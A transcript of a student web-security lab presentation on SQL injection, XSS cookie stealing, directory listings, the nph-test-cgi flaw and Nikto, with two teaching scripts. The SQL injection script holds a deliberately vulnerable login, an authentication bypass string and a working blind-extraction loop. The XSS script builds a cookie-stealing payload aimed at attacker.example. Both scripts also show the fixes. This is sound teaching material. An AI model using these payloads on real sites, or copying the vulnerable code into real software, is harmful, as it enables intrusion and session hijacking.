
Web Security


Presentation Transcript


  1. Web Security Group 5 Adam Swett Brian Marco

  2. Why Web Security? • Web sites and web applications constantly growing • Complex business applications are now delivered over the web • Increased “web hacking” activity • Web worms (e.g. the Samy MySpace worm, which spread through an XSS flaw) • Firewalls? (they pass port 80/443 traffic through, so they do not stop attacks carried inside legitimate HTTP requests)

  3. Difficulties In Traditional Hacking • Modern networks are more secure • Firewalls are used in all network rollouts • OS vendors patch holes quickly • Increased maturity in coding

  4. Firewalls

  5. Lab Sections • SQL Injection • Basic • Blind • Cross Site Scripting (XSS) • Basics • Cookie Stealing • JavaScript • Default Pages • CGI Vulnerabilities • Vulnerable Scripts • Nikto

  6. SQL Injection • Exploits an application that builds SQL queries by concatenating untrusted input into the query text; the database then executes whatever it is handed, including the attacker's clauses • With errors (error messages leak query structure and data) • Blind (no errors or data are shown; the attacker infers results one true/false answer at a time) • Automated (tools drive the above at scale)

  7. SQL Injection

  8. SQL Injection
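The two lab variants above (basic and blind) in one runnable script. This is an added example written for this page, not material from the slides or from any of the cited sources; the user table, the credentials in it and the injection strings are constructed here. It uses SQLite only because it needs no server; the concatenation bug and the boolean-inference loop look the same against any SQL database.

```python
import sqlite3
import string


def build_db():
    """Constructed sample data: a tiny users table in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """VULNERABLE on purpose: user input is pasted straight into the SQL text."""
    sql = f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Hardened version: placeholders keep the data out of the query grammar."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def blind_extract_password(conn, username, charset=string.ascii_letters + string.digits, max_len=32):
    """Boolean-based blind injection: the only oracle is whether login 'succeeded'.

    Each probe injects  AND substr(password, pos, 1) = 'c'  into the username and
    comments out the real password check with --, so a successful login means
    character `pos` of the stored password is `c`.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for c in charset:
            payload = f"{username}' AND substr(password,{pos},1)='{c}'--"
            if login_vulnerable(conn, payload, "x"):
                recovered += c
                break
        else:
            # No character matched: we ran off the end of the string (or hit a
            # character outside the charset), so stop.
            break
    return recovered


if __name__ == "__main__":
    db = build_db()
    # Basic: comment out the password check entirely.
    print("bypass, vulnerable:", login_vulnerable(db, "admin' --", "wrong"))  # True
    print("bypass, safe:      ", login_safe(db, "admin' --", "wrong"))        # False
    # Blind: recover the admin password without ever seeing it or an error.
    print("blind extraction:  ", blind_extract_password(db, "admin"))        # s3cret
```

Each blind probe costs one request per candidate character, which is why real tools use binary search over character codes rather than the linear scan shown here; the inference is identical. The fix is the one in `login_safe`: never assemble SQL from strings, bind parameters instead.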

  9. Cross Site Scripting • SecurityFocus cataloged over 1,400 issues. • WhiteHat Security has Identified over 1,500 in custom web applications. 8 in 10 websites have XSS. • Tops the Web Hacking Incident Database (WHID)

  10. Cross Site Scripting • Cookie Stealing • One of the most common uses of XSS • Lets the attacker impersonate the victim • Leads to session hijacking • HTTP is stateless: the server verifies credentials once, at login, and from then on trusts the session cookie alone, so whoever holds the cookie is, to the server, the user

  11. Cross Site Scripting • JavaScript • Any page, or anything an attacker manages to inject into a page, can ship script that runs in the visitor's browser with that site's cookies and privileges • Most people have JavaScript enabled, which makes injected script very dangerous

  12. Cross Site Scripting • JavaScript examples (what injected script can make victims' browsers do) • Black hat search engine optimization (SEO) • Click fraud • Distributed Denial of Service • Forced access to illegal content • Attacking other websites (IDS sirens) • Distributed email spam (Outlook Web Access) • Distributed blog spam • Vote tampering • De-anonymizing people • etc.

  13. Cross Site Scripting
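Slides 10 and 11 together, as an added example that is not part of the original presentation: a page that reflects a search term unescaped, the cookie-stealing payload that exploits it, the escaped version that neutralises it, and a server-side session lookup showing why a stolen cookie is enough to impersonate the victim. The collector URL `attacker.example`, the session table and the cookie values are all constructed for this example.

```python
import html

# Hypothetical attacker endpoint that receives exfiltrated cookies (constructed).
ATTACKER_COLLECTOR = "https://attacker.example/collect"

# Classic cookie stealer: load an image whose URL carries document.cookie.
COOKIE_STEALER = (
    "<script>new Image().src='" + ATTACKER_COLLECTOR
    + "?c='+encodeURIComponent(document.cookie)</script>"
)


def render_search_vulnerable(query):
    """VULNERABLE on purpose: the query is reflected into the HTML unescaped."""
    return f"<h1>Results for {query}</h1>"


def render_search_safe(query):
    """Hardened: HTML-escape untrusted text before it reaches the page."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def contains_live_script(page_html):
    """Crude check used only to show the difference between the two renderers."""
    return "<script>" in page_html.lower()


def cookie_exposed_to_script(set_cookie_header):
    """True if the Set-Cookie header lacks HttpOnly, i.e. document.cookie can read it."""
    attributes = [part.strip().lower() for part in set_cookie_header.split(";")[1:]]
    return "httponly" not in attributes


# Constructed session store: after login the server only remembers this mapping.
SESSIONS = {"abc123": "alice", "zz9plural": "bob"}


def whoami(cookie_header):
    """What a stateless server does on every request: look the cookie up, nothing more.

    The server cannot tell whether the request came from alice's browser or from
    an attacker replaying a cookie stolen via XSS.
    """
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "session":
            return SESSIONS.get(value)
    return None


if __name__ == "__main__":
    print(render_search_vulnerable(COOKIE_STEALER))   # script tag intact: executes
    print(render_search_safe(COOKIE_STEALER))         # &lt;script&gt;...: inert text
    print(cookie_exposed_to_script("session=abc123; Path=/"))                     # True
    print(cookie_exposed_to_script("session=abc123; Path=/; HttpOnly; Secure"))   # False
    # The attacker replays what the payload exfiltrated and is served as alice.
    print(whoami("session=abc123"))                   # alice
```

Output encoding is the fix for the injection itself; the `HttpOnly` attribute is the defence-in-depth that keeps a cookie out of `document.cookie` even when an XSS slips through, so the stealer above collects nothing from a cookie set with it.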

  14. Default Pages • Careless hosting • Lets a visitor browse and retrieve the complete contents of a directory on the web server • Happens when the directory has no index (default) page and the server falls back to generating a listing • Caused by a not-so-strict web server configuration (automatic directory indexing left enabled; in Apache it is turned off with `Options -Indexes`)

  15. Default Pages

  16. CGI Vulnerabilities • A number of widely distributed CGI scripts contain known security holes • Finding the scripts and exploiting them can be time consuming • Usually well documented on the web • Some can be worth it

  17. CGI Vulnerabilities • nph-test-cgi • Sample script shipped with old versions of the Apache web server • Lets a remote user list files on the server: the script echoed its query string through the shell unquoted, so a wildcard such as `*` in the request was expanded into a directory listing

  18. nph-test-cgi

  19. Nikto • Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3300 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired)

  20. Nikto

  21. Sources • NetSquare Blackhat Asia Presentation • Whitehat Security • Spi Dynamics
